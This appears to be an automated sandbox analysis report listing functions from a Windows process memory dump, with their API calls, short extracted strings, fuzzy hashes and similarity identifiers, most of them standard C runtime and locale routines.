Opcode Fuzzy Hash: d348dd2e255e7a04975d9478a94b6ef38bd829f02040cb2e86af2ca7f9850373
Instruction Fuzzy Hash: 84816270D0578ADECF01EFB895556EEBFB4BF55300F14846EE104AB281DBB48A04EB65

Uniqueness

Uniqueness Score: -1.00%

Function 0043267E, Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 467COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00432682

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 0043268D

Part of subcall function 00460CFB: __EH_prolog.LIBCMT ref: 00460D00

Part of subcall function 004AB703: std::_Deallocate.LIBCONCRT ref: 004AB733

Part of subcall function 004B201B: __EH_prolog.LIBCMT ref: 004B2020
Part of subcall function 004B201B: _strlen.LIBCMT ref: 004B203A

Part of subcall function 004B20A2: __EH_prolog.LIBCMT ref: 004B20A7

Part of subcall function 004B0852: __EH_prolog.LIBCMT ref: 004B0857

Part of subcall function 00461197: __EH_prolog.LIBCMT ref: 0046119C

Part of subcall function 00460888: __EH_prolog.LIBCMT ref: 0046088D

Part of subcall function 00461197: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000,00000008,00596E69,00000000), ref: 0046121C
Part of subcall function 00461197: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000008,00596E69), ref: 00461254

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

Strings

, xrefs: 00432BB2
S, xrefs: 00432A02
dpY, xrefs: 00432870
}, xrefs: 0043299E

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ByteCharDeallocateMultiWidestd::_$ExceptionException@8RaiseThrow_strlen
String ID: $S$dpY$}
API String ID: 4020726430-746112674
Opcode ID: 93a88293fc35240be4f39671322cdd4986a291cfa9df141bf88378d166250edc
Instruction ID: 33e64cb7c2b1de9c5e2858491d9c87aa173111da7c50e413dad8460d0dce7dc2
Opcode Fuzzy Hash: 93a88293fc35240be4f39671322cdd4986a291cfa9df141bf88378d166250edc
Instruction Fuzzy Hash: F2129070D0529CEEDB15EBA9CD41BDEBBB8AF16304F10409EE00567192DBB81F44DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00419150, Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 424networkCOMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00419154

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 0041915F
gethostbyname.WS2_32(?), ref: 00419194

Part of subcall function 00415489: __EH_prolog.LIBCMT ref: 0041548E
Part of subcall function 00415489: new.LIBCMT ref: 004154A0
Part of subcall function 00415489: new.LIBCMT ref: 004154DE

Part of subcall function 00416C3E: htons.WS2_32(?), ref: 00416C76
Part of subcall function 00416C3E: htonl.WS2_32(00000000), ref: 00416C8D
Part of subcall function 00416C3E: htonl.WS2_32(00000000), ref: 00416C94

Strings

Active, xrefs: 004195F3
^, xrefs: 004191E0
+, xrefs: 004193C0

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prologhtonl$ExceptionException@8RaiseThrowgethostbynamehtons
String ID: +$Active$^
API String ID: 2841390951-2913068736
Opcode ID: f4177164a0d2d50b4a4e86f48eb7076db0ec354e21fe24ea7bd853e9a2334099
Instruction ID: 76f2b2ba441e3810c476b648d6b09e66f3cf649257ec26b1ff93bedae93abb77
Opcode Fuzzy Hash: f4177164a0d2d50b4a4e86f48eb7076db0ec354e21fe24ea7bd853e9a2334099
Instruction Fuzzy Hash: 3C029E7280025CEEDB11DFA4DC91BEEB7B8AF15304F1041AFE509A7192EB785E88CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0041A360, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 225COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0041A364

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 0041A36F

Part of subcall function 0041D074: __EH_prolog.LIBCMT ref: 0041D079

Part of subcall function 0047DA23: __EH_prolog.LIBCMT ref: 0047DA28
Part of subcall function 0047DA23: GetModuleHandleA.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 0047DAD7
Part of subcall function 0047DA23: GetProcAddress.KERNEL32(00000000), ref: 0047DADE

Part of subcall function 00413FDC: std::_Throw_Cpp_error.LIBCPMT ref: 00413FE7

Strings

A, xrefs: 0041A3ED
L, xrefs: 0041A3FB
P, xrefs: 0041A3F4
`, xrefs: 0041A47D

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$AddressCpp_errorExceptionException@8HandleModuleProcRaiseThrowThrow_std::_
String ID: A$L$P$`
API String ID: 3644655947-2174273020
Opcode ID: e0a33b456e0e83d81abe1ec28e067e860f974ba82a129357bb7a97250ed700a5
Instruction ID: 24418ed412d0487b69b78dcf83cc3fd5e794bcf791caf4c1afd30921b42fe6ed
Opcode Fuzzy Hash: e0a33b456e0e83d81abe1ec28e067e860f974ba82a129357bb7a97250ed700a5
Instruction Fuzzy Hash: EB81E371D0424CAEDB00DFA9DC81BEEBBB8EF59304F10412EF505A7292EB785A84CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0042C89D, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 180COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042C8A2

Part of subcall function 00476ADD: __EH_prolog.LIBCMT ref: 00476AE2

Part of subcall function 00461197: __EH_prolog.LIBCMT ref: 0046119C

Part of subcall function 004A954B: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004A9578

Strings

B, xrefs: 0042C905
X, xrefs: 0042C90C
;, xrefs: 0042C913
5, xrefs: 0042C9F1
I, xrefs: 0042C9F8

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Ios_base_dtorstd::ios_base::_
String ID: 5$;$B$I$X
API String ID: 420165198-800781944
Opcode ID: d3c2c416cdb6f3e5c338675efa519d62e45266f3b4a16df5ae7449bb4d225b91
Instruction ID: 71e3667e650e1c2d3238ec360d67e8f501d080642bddfb6115546527270b07ea
Opcode Fuzzy Hash: d3c2c416cdb6f3e5c338675efa519d62e45266f3b4a16df5ae7449bb4d225b91
Instruction Fuzzy Hash: D671DFB0D05298DADB10DFA5DD81BEDBBB4AF26308F1040AEE50577282DB781F49CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0042A3E7, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 170COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042A3EC
GetWindowTextW.USER32(?,00000001), ref: 0042A45D

Part of subcall function 00461060: __EH_prolog.LIBCMT ref: 00461065

Part of subcall function 004AB703: std::_Deallocate.LIBCONCRT ref: 004AB733

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

Strings

Master: , xrefs: 0042A50B
}nY, xrefs: 0042A5C6
inY, xrefs: 0042A5B2
Master: , xrefs: 0042A4AF

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: DeallocateH_prologstd::_$TextWindow
String ID: Master: $Master: $inY$}nY
API String ID: 3018432088-1176296115
Opcode ID: 64aaf094c280b53e2bf2692e9a00d8dab32d90a078d8af80e55a774a7573f364
Instruction ID: c2da6db55fb7418e840aa233aea7bafd0737402a6d03c2df65e188ea527720ad
Opcode Fuzzy Hash: 64aaf094c280b53e2bf2692e9a00d8dab32d90a078d8af80e55a774a7573f364
Instruction Fuzzy Hash: FA61A370904158EEDB11EFA5DC95EDEBB78EF61308F10415EF10267192EB781B48CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 006A8527, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,?,?,?,?,?,?,?,?,006A8C9C,00000003,?,00000000,?,00000003,0000000C), ref: 006A8569
__fassign.LIBCMT ref: 006A85E4
__fassign.LIBCMT ref: 006A85FF
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 006A8625
WriteFile.KERNEL32(?,00000000,00000000,006A8C9C,00000000,?,?,?,?,?,?,?,?,?,006A8C9C,00000003), ref: 006A8644
WriteFile.KERNEL32(?,00000003,00000001,006A8C9C,00000000,?,?,?,?,?,?,?,?,?,006A8C9C,00000003), ref: 006A867D

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: a4fb15a280a3df87c7f1162d6d12aa4791068cc59d807f6e0048688618483a99
Instruction ID: 4af2083b363394f3ca84eaff485e078f5c9dece442a29705e769d0c756245d66
Opcode Fuzzy Hash: a4fb15a280a3df87c7f1162d6d12aa4791068cc59d807f6e0048688618483a99
Instruction Fuzzy Hash: 1051B4B09002499FDF10DFA8D885AEEBBFAEF0A300F14415AE955E7291DB70AD41CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0046237A, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 118COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0046237F

Strings

<, xrefs: 00462449
>, xrefs: 00462442
", xrefs: 0046245E
', xrefs: 00462450
&, xrefs: 00462457

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: &$'$>$<$"
API String ID: 3519838083-87953025
Opcode ID: 0d17481fadc63b184b842f39d9755eae4be313e2e97948c019425df2077dd0bf
Instruction ID: bc46da44195ae29228bd5d2a7b02967f5d602946dce344660bc559aafc266b8c
Opcode Fuzzy Hash: 0d17481fadc63b184b842f39d9755eae4be313e2e97948c019425df2077dd0bf
Instruction Fuzzy Hash: 6241E470A15614EFCB05DFA8DA856ADBBB4FF05B04F10411FE401A7251EBB89E42CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 004B1281, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B1286
std::exception::exception.LIBCONCRT ref: 004B1345
__CxxThrowException@8.LIBVCRUNTIME ref: 004B1372

Strings

expected <, xrefs: 004B133D
4s, xrefs: 004B1369, 004B1371
text, xrefs: 004B12A4

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Exception@8H_prologThrowstd::exception::exception
String ID: 4s$expected <$text
API String ID: 1340123063-3308706680
Opcode ID: f4b596e56b0b1e3a52c4a593168d4f51ed1d5adf09de71704b99ce2e3d2e4687
Instruction ID: d9546ddd135b8cf094cca5dbe347f790c9c69720d7cdc24981f0c33ca2c0f014
Opcode Fuzzy Hash: f4b596e56b0b1e3a52c4a593168d4f51ed1d5adf09de71704b99ce2e3d2e4687
Instruction Fuzzy Hash: 7531C771D00349ABDF10CF69C450AEABBE4BF14350B44426EEC54EB791D379D901CB94

Uniqueness

Uniqueness Score: -1.00%

Function 006B3344, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 006B308B: _free.LIBCMT ref: 006B30B4

_free.LIBCMT ref: 006B3392

Part of subcall function 006A071F: RtlFreeHeap.NTDLL(00000000,00000000,?,006B30B9,?,00000000,?,00000000,?,006B335D,?,00000007,?,?,006B3746,?), ref: 006A0735
Part of subcall function 006A071F: GetLastError.KERNEL32(?,?,006B30B9,?,00000000,?,00000000,?,006B335D,?,00000007,?,?,006B3746,?,?), ref: 006A0747

_free.LIBCMT ref: 006B339D
_free.LIBCMT ref: 006B33A8
_free.LIBCMT ref: 006B33FC
_free.LIBCMT ref: 006B3407
_free.LIBCMT ref: 006B3412
_free.LIBCMT ref: 006B341D

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ac6e9f41725dbc442b8bf6185ea0e6681560b3f7bb414a306dcc5ae4d5976125
Instruction ID: f8fa9848ae50d5837f6260adba8007ed8adb660ecc6370a83eee419dea8051ce
Opcode Fuzzy Hash: ac6e9f41725dbc442b8bf6185ea0e6681560b3f7bb414a306dcc5ae4d5976125
Instruction Fuzzy Hash: 361172B1640718E6D5A0B770CC47FCB779E5F05700F40081CB299662E3DB34BA544B55

Uniqueness

Uniqueness Score: -1.00%

Function 006900FC, Relevance: 10.6, APIs: 7, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,006900F3,0068F54D,00582AB1,0000000C,00582D94,?,?,?,?,00413A42,?,?), ref: 0069010A
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00690118
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00690131
SetLastError.KERNEL32(00000000,?,006900F3,0068F54D,00582AB1,0000000C,00582D94,?,?,?,?,00413A42,?,?), ref: 00690183

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 5340f9a24e142925b2301bf7bca368ba6d16f6fa562447b18330113c868601b4
Instruction ID: d11d2948e26b249223f5eba63a445aae939a2f14cc7691c44b8471b0f6637430
Opcode Fuzzy Hash: 5340f9a24e142925b2301bf7bca368ba6d16f6fa562447b18330113c868601b4
Instruction Fuzzy Hash: 8401F13220D3216EBB6027B4AC86566265BDB07374730472FF610856F2EF215C015258

Uniqueness

Uniqueness Score: -1.00%

Function 00586613, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0058661A
std::_Lockit::_Lockit.LIBCPMT ref: 00586624

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 00586644
collate.LIBCPMT ref: 0058665E
__CxxThrowException@8.LIBVCRUNTIME ref: 0058667B
std::_Facet_Register.LIBCPMT ref: 0058669A
std::_Lockit::~_Lockit.LIBCPMT ref: 005866A3

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowcollatestd::locale::_
String ID:
API String ID: 2345145342-0
Opcode ID: 683afa396c505158beeeeb8ace92440f3687866c2c37f2ba32805dd7e5aa8164
Instruction ID: 5e317d96a1dbf30aff8a3822c17898891257cb953877e46a45bff8bbf661fe95
Opcode Fuzzy Hash: 683afa396c505158beeeeb8ace92440f3687866c2c37f2ba32805dd7e5aa8164
Instruction Fuzzy Hash: 7E010875E0012A9BCF00FBA0C846ABD7B76BF94720F54011EF81177291DF78AE018795

Uniqueness

Uniqueness Score: -1.00%

Function 005866B0, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005866B7
std::_Lockit::_Lockit.LIBCPMT ref: 005866C1

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 005866E1
collate.LIBCPMT ref: 005866FB
__CxxThrowException@8.LIBVCRUNTIME ref: 00586718
std::_Facet_Register.LIBCPMT ref: 00586737
std::_Lockit::~_Lockit.LIBCPMT ref: 00586740

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowcollatestd::locale::_
String ID:
API String ID: 2345145342-0
Opcode ID: 0acb5f08232a8573e42383827a7b808f246a0ac887cf775fa01c9283701b9942
Instruction ID: 15cd7fd3c8c26779230ddd846801634f45a8de773b305829b6d06c6bd94e21bd
Opcode Fuzzy Hash: 0acb5f08232a8573e42383827a7b808f246a0ac887cf775fa01c9283701b9942
Instruction Fuzzy Hash: 1601E536D0012997DF10FBA0C846ABD7B72BF90724F54012EE91177291DF78AA018785

Uniqueness

Uniqueness Score: -1.00%

Function 0058674D, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00586754
std::_Lockit::_Lockit.LIBCPMT ref: 0058675E

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 0058677E
ctype.LIBCPMT ref: 00586798
__CxxThrowException@8.LIBVCRUNTIME ref: 005867B5
std::_Facet_Register.LIBCPMT ref: 005867D4
std::_Lockit::~_Lockit.LIBCPMT ref: 005867DD

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowctypestd::locale::_
String ID:
API String ID: 189735510-0
Opcode ID: d047c7202cb365e672107b8492bac120284b965a5602e7ed5ecebbe136fec144
Instruction ID: e11fefb2a72ecffb1491abc52e138d9de10666e561de059b3711717e62cc3b09
Opcode Fuzzy Hash: d047c7202cb365e672107b8492bac120284b965a5602e7ed5ecebbe136fec144
Instruction Fuzzy Hash: F401CE36D001299BDF00FBA0C846ABD7B72BF90724F14051EF81177291CF78AA028785

Uniqueness

Uniqueness Score: -1.00%

Function 005867EA, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005867F1
std::_Lockit::_Lockit.LIBCPMT ref: 005867FB

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 0058681B
messages.LIBCPMT ref: 00586835
__CxxThrowException@8.LIBVCRUNTIME ref: 00586852
std::_Facet_Register.LIBCPMT ref: 00586871
std::_Lockit::~_Lockit.LIBCPMT ref: 0058687A

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmessagesstd::locale::_
String ID:
API String ID: 2194591311-0
Opcode ID: 31a66c2aef54546729fbc5e278748624d23b6838a7b294471b6e1c0ea853229f
Instruction ID: e590f0d58e44e9733ddb287f0ca2c12532de19a3ec23654ed94b8b34b71a9dd8
Opcode Fuzzy Hash: 31a66c2aef54546729fbc5e278748624d23b6838a7b294471b6e1c0ea853229f
Instruction Fuzzy Hash: 6A01E172D0012A8BCF00FBA0C846ABD7BB2BF90720F54051EE91577291CF78AE028B85

Uniqueness

Uniqueness Score: -1.00%

Function 00586887, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0058688E
std::_Lockit::_Lockit.LIBCPMT ref: 00586898

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 005868B8
messages.LIBCPMT ref: 005868D2
__CxxThrowException@8.LIBVCRUNTIME ref: 005868EF
std::_Facet_Register.LIBCPMT ref: 0058690E
std::_Lockit::~_Lockit.LIBCPMT ref: 00586917

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmessagesstd::locale::_
String ID:
API String ID: 2194591311-0
Opcode ID: d0d7d180868ba6a60cc2113eca6e935ba914a2ee46205c1a11ef25591b9f55ea
Instruction ID: 5b981ecb1315f14c0bfae78f3a02e225e8b6a0d4f3834e27cb80d651ff8356d0
Opcode Fuzzy Hash: d0d7d180868ba6a60cc2113eca6e935ba914a2ee46205c1a11ef25591b9f55ea
Instruction Fuzzy Hash: 4201E575D0012A97CF04FBA0C8465BD7B72BF94720F14011EE911772D1CF78AE028B95

Uniqueness

Uniqueness Score: -1.00%

Function 00586B98, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00586B9F
std::_Lockit::_Lockit.LIBCPMT ref: 00586BA9

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 00586BC9
moneypunct.LIBCPMT ref: 00586BE3
__CxxThrowException@8.LIBVCRUNTIME ref: 00586C00
std::_Facet_Register.LIBCPMT ref: 00586C1F
std::_Lockit::~_Lockit.LIBCPMT ref: 00586C28

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmoneypunctstd::locale::_
String ID:
API String ID: 3858443405-0
Opcode ID: a431a7e3066f17ca6c6dde879a52e080e93229557c827164c6bf9d64ddbfbaef
Instruction ID: 84f716b36b8fe4b0eeb5c346d4afb5d5bdea63b8828cecab74281361ddc59401
Opcode Fuzzy Hash: a431a7e3066f17ca6c6dde879a52e080e93229557c827164c6bf9d64ddbfbaef
Instruction Fuzzy Hash: FA018232D0012A9BCF05FBA0C8466BD7B76FF84720F54451EE91177291DF78AE028B95

Uniqueness

Uniqueness Score: -1.00%

Function 00586C35, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00586C3C
std::_Lockit::_Lockit.LIBCPMT ref: 00586C46

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 00586C66
moneypunct.LIBCPMT ref: 00586C80
__CxxThrowException@8.LIBVCRUNTIME ref: 00586C9D
std::_Facet_Register.LIBCPMT ref: 00586CBC
std::_Lockit::~_Lockit.LIBCPMT ref: 00586CC5

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmoneypunctstd::locale::_
String ID:
API String ID: 3858443405-0
Opcode ID: f065ec6cdf588a1e04eb21ec069a1ab8545a4c531ab3202a9d74999f1de50bb7
Instruction ID: d3ca6d3b0303df7d872e8f47537471738708f80f192dbc6f870ce2738a0ab25a
Opcode Fuzzy Hash: f065ec6cdf588a1e04eb21ec069a1ab8545a4c531ab3202a9d74999f1de50bb7
Instruction Fuzzy Hash: A601E176E0012997DF00FBA0C856ABD7B76FF84720F54011EE91177291DF78AE028785

Uniqueness

Uniqueness Score: -1.00%

Function 00586CD2, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00586CD9
std::_Lockit::_Lockit.LIBCPMT ref: 00586CE3

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 00586D03
moneypunct.LIBCPMT ref: 00586D1D
__CxxThrowException@8.LIBVCRUNTIME ref: 00586D3A
std::_Facet_Register.LIBCPMT ref: 00586D59
std::_Lockit::~_Lockit.LIBCPMT ref: 00586D62

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmoneypunctstd::locale::_
String ID:
API String ID: 3858443405-0
Opcode ID: acb03900e7c652400073e6cd5399060b0ea66d0eb0d7b5cab16bad849e1c65a7
Instruction ID: 7b169e9101996b769d04c76ad6e4245447e232e0c4e9294188ed1d51b17dc7a6
Opcode Fuzzy Hash: acb03900e7c652400073e6cd5399060b0ea66d0eb0d7b5cab16bad849e1c65a7
Instruction Fuzzy Hash: D801E571E001298BCF01FBA0CC569BD7B72BF90720F54011EE8117B291DF78AA018B85

Uniqueness

Uniqueness Score: -1.00%

Function 00586D6F, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00586D76
std::_Lockit::_Lockit.LIBCPMT ref: 00586D80

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 00586DA0
moneypunct.LIBCPMT ref: 00586DBA
__CxxThrowException@8.LIBVCRUNTIME ref: 00586DD7
std::_Facet_Register.LIBCPMT ref: 00586DF6
std::_Lockit::~_Lockit.LIBCPMT ref: 00586DFF

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmoneypunctstd::locale::_
String ID:
API String ID: 3858443405-0
Opcode ID: 9cf5ef946ec30e25079d90c3c6a2712117edf0fffc5c669b95cd192a71f7b829
Instruction ID: e2dcb485ef0cc89e99be61f09e5582cafe4b5cc1ebd3bfdfcf518d8b622bee66
Opcode Fuzzy Hash: 9cf5ef946ec30e25079d90c3c6a2712117edf0fffc5c669b95cd192a71f7b829
Instruction Fuzzy Hash: 8201E532E0012A9BDF00FBA0D8466BD7B76BF94720F54011EE81177291CF78AE028785

Uniqueness

Uniqueness Score: -1.00%

Function 00587080, Relevance: 10.6, APIs: 7, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00587087
std::_Lockit::_Lockit.LIBCPMT ref: 00587091

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 005870B1
numpunct.LIBCPMT ref: 005870CB
__CxxThrowException@8.LIBVCRUNTIME ref: 005870E8
std::_Facet_Register.LIBCPMT ref: 00587107
std::_Lockit::~_Lockit.LIBCPMT ref: 00587110

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrownumpunctstd::locale::_
String ID:
API String ID: 639073845-0
Opcode ID: 6096f5c05e7e849b781bd7e7e4d1d9f3805acc74fb4ffe7450b9d0411b96f4f8
Instruction ID: bc20c7c6c020120fc78f8b37736ad502b5a0e4a9b75e94a0075530af322d9527
Opcode Fuzzy Hash: 6096f5c05e7e849b781bd7e7e4d1d9f3805acc74fb4ffe7450b9d0411b96f4f8
Instruction Fuzzy Hash: D7018E36D0412A97CF05FBA0C84AABD7B76BF94720F64051AE8117B291DF78EA01CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0058711D, Relevance: 10.6, APIs: 7, Instructions: 51COMMON
